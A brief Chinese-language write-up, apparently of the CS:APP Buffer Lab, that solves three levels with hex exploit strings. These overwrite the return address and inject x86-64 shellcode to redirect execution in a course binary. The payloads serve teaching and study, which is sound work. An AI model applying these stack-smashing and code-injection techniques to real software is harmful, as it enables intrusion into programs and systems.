stack 大概长这样
Level 0: Candle
只要覆盖掉return 就行了
比如:
c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00
Level 1: Sparkler
要求将 arg 变为 cookie值
c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 70 10 40 00 00 00 00 00 b6 c4 fd 29 b2 96 02 3f b6 c4 fd 29 b2 96 02 3f
Level 2: Firecracker
要求将 bang 里面的global value 设为 cookie 值。
思路是:先return到 stack 上的特定代码段,执行我们替换global value 的代码,然后在返回到bang函数
替换 global 的汇编代码为
mov 0x602320, %rsi mov %rsi, 0x602308 push $0x00401020 retq
通过
$ gcc -c test.s
$ objdump -d test.o > test.d
生成二进制代码
test.o: file format elf64-x86-64 Disassembly of section .text: 0000000000000000 <.text>: 0: 48 8b 34 25 20 23 60 mov 0x602320,%rsi 7: 00 8: 48 89 34 25 08 23 60 mov %rsi,0x602308 f: 00 10: 68 20 10 40 00 pushq $0x401020 15: c3 retq
然后将这段二进制代码插入特定stack段
48 8b 34 25 20 23 60 00 48 89 34 25 08 23 60 00 68 20 10 40 00 c3 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 00 b7 ff ff ff 7f 00 00
这样就ok了
Extra Credit – Level 3: Dynamite 下次在做
2015-09-28